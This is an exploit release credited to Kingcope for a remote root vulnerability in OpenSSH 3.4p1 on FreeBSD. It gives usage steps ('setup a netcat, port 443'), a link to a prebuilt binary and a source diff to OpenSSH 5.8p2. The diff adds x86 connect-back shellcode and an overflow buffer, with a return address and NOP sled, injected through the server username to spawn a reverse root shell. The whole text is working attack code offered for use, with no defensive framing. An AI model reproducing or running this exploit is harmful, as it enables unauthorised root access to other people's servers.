OpenSSH 3.4p1 FreeBSD Remote Root Exploit

`OpenSSH FreeBSD Remote Root Exploit  
By Kingcope  
Year 2011  
  
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702  
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924  
run like ./ssh -1 -z <yourip> <target>  
setup a netcat, port 443 on yourip first  
  
a statically linked linux binary of the exploit can be found below  
attached is a diff to openssh-5.8p2.  
  
the statically linked binary can be downloaded from  
http://isowarez.de/ssh_0day  
  
I know these versions are really old, some seem to run  
that tough.  
  
-Cheers, King "the archaeologist" Cope  
  
diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c  
149a150  
> char *myip;  
195a197,203  
> "OpenSSH FreeBSD Remote Root Exploit\n"  
> "By Kingcope\n"  
> "Year 2011\n\n"  
> "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n"  
> "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n"  
> "run like ./ssh -1 -z <yourip> <target>\n"  
> "setup a netcat, port 443 on yourip first\n\n"  
299c307  
< while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx"  
---  
> while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:z:p:qstvx"  
335a344,346  
> break;  
> case 'z':  
> myip = optarg;  
diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c  
667a668,719  
> //IP=\xc0\xa8\x20\x80  
> #define IPADDR "\xc0\xa8\x20\x80"  
> #define PORT "\x27\x10" /* htons(10000) */  
>  
> char sc[] =  
> "\x90\x90"  
> "\x90\x90"  
> "\x31\xc9" // xor ecx, ecx  
> "\xf7\xe1" // mul ecx  
> "\x51" // push ecx  
> "\x41" // inc ecx  
> "\x51" // push ecx  
> "\x41" // inc ecx  
> "\x51" // push ecx  
> "\x51" // push ecx  
> "\xb0\x61" // mov al, 97  
> "\xcd\x80" // int 80h  
> "\x89\xc3" // mov ebx, eax  
> "\x68"IPADDR // push dword 0101017fh  
> "\x66\x68"PORT // push word 4135  
> "\x66\x51" // push cx  
> "\x89\xe6" // mov esi, esp  
> "\xb2\x10" // mov dl, 16  
> "\x52" // push edx  
> "\x56" // push esi  
> "\x50" // push eax  
> "\x50" // push eax  
> "\xb0\x62" // mov al, 98  
> "\xcd\x80" // int 80h  
> "\x41" // inc ecx  
> "\xb0\x5a" // mov al, 90  
> "\x49" // dec ecx  
> "\x51" // push ecx  
> "\x53" // push ebx  
> "\x53" // push ebx  
> "\xcd\x80" // int 80h  
> "\x41" // inc ecx  
> "\xe2\xf5" // loop -10  
> "\x51" // push ecx  
> "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh  
> "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh  
> "\x89\xe3" // mov ebx, esp  
> "\x51" // push ecx  
> "\x54" // push esp  
> "\x53" // push ebx  
> "\x53" // push ebx  
> "\xb0\xc4\x34\xff"  
> "\xcd\x80"; // int 80h  
>  
>  
> extern char *myip;  
>  
678a731,748  
>  
> char buffer[100000];  
>  
> printf("OpenSSH Remote Root Exploit\n");  
> printf("By Kingcope\n");  
> printf("Year 2011\n\n");  
> printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n");  
> printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n");  
> printf("Connect back to: %s:443\n", myip);  
>  
> *((unsigned long*)(sc + 21)) = inet_addr(myip);  
> *((unsigned short*)(sc + 27)) = htons(443);  
>  
> memset(buffer, 'V', 8096);  
> memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4); // SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702  
> memset(buffer+28, '\x90', 65535);  
> memcpy(buffer+28+65535, sc, sizeof(sc));  
> server_user=buffer;  
  
`